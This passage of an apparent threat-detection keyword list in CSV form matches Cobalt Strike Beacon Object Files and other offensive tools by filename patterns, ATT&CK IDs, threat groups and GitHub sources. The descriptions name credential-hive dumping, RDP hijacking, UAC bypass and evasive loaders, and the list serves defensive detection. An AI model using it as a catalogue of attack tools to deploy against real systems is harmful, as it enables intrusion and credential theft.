T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","0","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*bofnet_shutdown*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - 
T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*BOFNET_Tests*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*bofportscan *","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","0","N/A","10","10","481","49","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" +"*bof-quser *.*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF for quser.exe implementation using Windows API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 
T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/Quser-BOF","1","0","N/A","10","10","78","10","2023-03-22T17:07:02Z","2021-04-01T15:19:50Z" +"*bof-quser.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF for quser.exe implementation using Windows API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/Quser-BOF","1","1","N/A","10","10","78","10","2023-03-22T17:07:02Z","2021-04-01T15:19:50Z" +"*bof-rdphijack*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1548.002 - T1548.003 - 
T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","10","3","257","39","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z" +"*bof-rdphijack*","offensive_tool_keyword","RDPHijack-BOF","BOF - RDPHijack - Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1021 - T1021.002 - T1032 - T1055 - T1070 - T1070.006 - T1070.007 - T1574.001","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","N/A","3","257","39","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z" +"*bof-regsave *","offensive_tool_keyword","cobaltstrike","Dumping SAM / SECURITY / SYSTEM registry hives with a Beacon Object File","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - 
T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/BOF-RegSave","1","0","N/A","10","10","171","29","2020-10-08T17:29:02Z","2020-10-07T13:46:03Z" +"*BofRunnerOutput*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" +"*BOFs*/SyscallsSpawn/*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" +"*Bofs/AssemblyLoader*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - 
T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*bof-servicemove *","offensive_tool_keyword","cobaltstrike","New lateral movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/ServiceMove-BOF","1","0","N/A","10","10","223","45","2022-02-23T07:17:38Z","2021-08-16T07:16:31Z" +"*bof-trustedpath-uacbypass*","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file implementation for trusted path UAC 
bypass. The target executable will be called without involving cmd.exe by using DCOM object.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","10","10","104","33","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z" +"*boko.py *","offensive_tool_keyword","boko","boko.py is an application scanner for macOS that searches for and identifies potential dylib hijacking and weak dylib vulnerabilities for application executables as well as scripts an application may use that have the potential to be backdoored","T1195 - T1078 - T1079 - T1574","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/bashexplode/boko","1","0","N/A","N/A","1","59","12","2021-09-28T22:36:01Z","2020-05-22T21:46:33Z" +"*bokoscanner.*","offensive_tool_keyword","boko","boko.py is an application scanner for macOS that searches for and identifies potential dylib hijacking and weak dylib vulnerabilities for application executables as well as scripts an application may use that have the potential to be 
backdoored","T1195 - T1078 - T1079 - T1574","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/bashexplode/boko","1","1","N/A","N/A","1","59","12","2021-09-28T22:36:01Z","2020-05-22T21:46:33Z" +"*boku_pe_customMZ*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*boku_pe_customPE*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*boku_pe_dll*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*boku_pe_mask_*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*boku_pe_MZ_from_C2Profile*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*boku_strrep*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*boku7/BokuLoader*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*boku7/HOLLOW*","offensive_tool_keyword","cobaltstrike","EarlyBird process hollowing technique (BOF) - Spawns a process in a suspended state. inject shellcode. 
